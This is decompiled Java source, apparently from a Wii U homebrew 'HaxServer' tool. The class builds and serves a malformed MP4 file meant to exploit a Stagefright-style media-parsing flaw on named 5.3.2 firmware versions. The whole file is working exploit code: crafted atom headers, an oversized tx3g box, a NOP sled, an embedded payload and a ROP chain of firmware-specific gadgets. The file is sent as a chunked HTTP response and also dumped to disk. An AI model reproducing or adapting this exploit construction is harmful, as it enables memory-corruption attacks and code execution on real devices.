/*     */ package com.gudenau.haxserver;
/*     */ 
/*     */ import java.io.ByteArrayOutputStream;
/*     */ import java.io.File;
/*     */ import java.io.FileOutputStream;
/*     */ import java.io.OutputStream;
/*     */ import java.nio.charset.StandardCharsets;
/*     */ 
/*     */ public class Stagefright
/*     */ {
/*     */   public static boolean serveHax(OutputStream out, SystemVersions systemVersion, HTTPRequest header, String payloadName)
/*     */     throws Exception
/*     */   {
/*  15 */     int tx3gSize = 32768;
/*     */     
/*  17 */     if ((systemVersion == SystemVersions.EU_5_3_2) || 
/*  18 */       (systemVersion == SystemVersions.US_5_3_2) || 
/*  19 */       (systemVersion == SystemVersions.JP_5_3_2)) {
/*  20 */       tx3gSize = 30720;
/*     */     }
/*     */     
/*  23 */     int tx3gRopStart = tx3gSize - 2048;
/*     */     
/*  25 */     int payloadSourceAddress = 341237032;
/*     */     
/*  27 */     ByteArrayOutputStream payloadSteam = new ByteArrayOutputStream();
/*     */     
/*  29 */     byte[] ropChain = RopChain.generate(payloadSourceAddress - 4096, systemVersion, payloadSourceAddress);
/*     */     
/*  31 */     Util.writeu32(24, payloadSteam);
/*  32 */     Util.writeu32(1718909296, payloadSteam);
/*  33 */     Util.writeu32(862416950, payloadSteam);
/*  34 */     Util.writeu32(256, payloadSteam);
/*  35 */     Util.writeu32(1769172845, payloadSteam);
/*  36 */     Util.writeu32(862409526, payloadSteam);
/*     */     
/*  38 */     Util.writeu32(tx3gSize + 4096, payloadSteam);
/*  39 */     Util.writeu32(1836019574, payloadSteam);
/*     */     
/*  41 */     Util.writeu32(108, payloadSteam);
/*  42 */     Util.writeu32(1677721600, payloadSteam);
/*     */     
/*  44 */     payloadSteam.write(Util.toArray("00000000C95B811AC95B811AFA0002580000022D000100000100000000000000000000000000FFFFF1000000000000000000000000010000000000000000000000000000400000000000000000000000000015696F6473000000001007004FFFFF2803FF"));
/*     */     
/*  46 */     Util.writeu32(tx3gSize + 2048, payloadSteam);
/*  47 */     Util.writeu32(1953653099, payloadSteam);
/*     */     
/*  49 */     Util.writeu32(92, payloadSteam);
/*  50 */     Util.writeu32(1953196132, payloadSteam);
/*  51 */     payloadSteam.write(Util.toArray("00000001C95B811AC95B811A00000001000000000000022D000000000000000000000000010000000001000000000000000800000000000000010000000000000000000000000000400000000000100000000000"));
/*     */     
/*  53 */     Util.writeu32(tx3gSize, payloadSteam);
/*  54 */     Util.writeu32(1954034535, payloadSteam);
/*     */     
/*  56 */     for (int i = 0; i < tx3gSize - 8; i += 4) {
/*  57 */       if (i < 24576) {
/*  58 */         if (i < 4096) {
/*  59 */           Util.writeu32(1610612736, payloadSteam);
/*  60 */         } else if (i < 20480) {
/*  61 */           byte[] payload = Payload.generatePayload(systemVersion, payloadName);
/*  62 */           payloadSteam.write(payload);
/*  63 */           i += payload.length - 4;
/*  64 */           if (i + 4 >= 24576) {
/*  65 */             System.err.println("Payload to big!");
/*  66 */             return false;
/*     */           }
/*     */           
/*  69 */           while (i + 4 < 20480) {
/*  70 */             Util.writeu32(-1869574000, payloadSteam);
/*  71 */             i += 4;
/*     */           }
/*     */         } else {
/*  74 */           Util.writeu32(1482184792, payloadSteam);
/*     */         }
/*  76 */       } else if (i < tx3gRopStart) {
/*  77 */         Util.writeu32(systemVersion.getConstantInt("POPJUMPLR_STACK12"), payloadSteam);
/*  78 */       } else if (i == tx3gRopStart) {
/*  79 */         Util.writeu32(systemVersion.getConstantInt("POPJUMPLR_STACK12"), payloadSteam);
/*  80 */         Util.writeu32(1212696648, payloadSteam);
/*  81 */         i += 8;
/*  82 */         payloadSteam.write(ropChain);
/*  83 */         i += ropChain.length - 4;
/*     */       } else {
/*  85 */         Util.writeu32(1212696648, payloadSteam);
/*     */       }
/*     */     }
/*     */     
/*  89 */     Util.writeu32(453, payloadSteam);
/*  90 */     Util.writeu32(1835297121, payloadSteam);
/*  91 */     Util.writeu32(1, payloadSteam);
/*  92 */     Util.writeu32(1954034535, payloadSteam);
/*  93 */     Util.writeu32(1, payloadSteam);
/*  94 */     Util.writeu32((int)(4294967296L - tx3gSize), payloadSteam);
/*     */     
/*  96 */     for (int i = 0; i < 8192; i += 4) {
/*  97 */       Util.writeu32(-2070567244, payloadSteam);
/*     */     }
/*     */     
/* 100 */     byte[] payload = payloadSteam.toByteArray();
/* 101 */     out.write((Integer.toHexString(payload.length) + "\r\n").getBytes(StandardCharsets.US_ASCII));
/* 102 */     out.write(payload);
/* 103 */     out.write("\r\n0\r\n\r\n".getBytes(StandardCharsets.US_ASCII));
/*     */     
/* 105 */     File dumpFile = new File("./dump/" + systemVersion.name() + "_" + payloadName + ".mp4");
/* 106 */     dumpFile.getParentFile().mkdirs();
/* 107 */     FileOutputStream fos = new FileOutputStream(dumpFile);
/* 108 */     fos.write(payload);
/* 109 */     fos.close();
/*     */     
/* 111 */     return true;
/*     */   }
/*     */ }


/* Location:              C:\Users\plessard\Downloads\tuto-wiiu-hack-kernel-5-5\console_us\HaxServer_org.jar!\com\gudenau\haxserver\Stagefright.class
 * Java compiler version: 8 (52.0)
 * JD-Core Version:       0.7.1
 */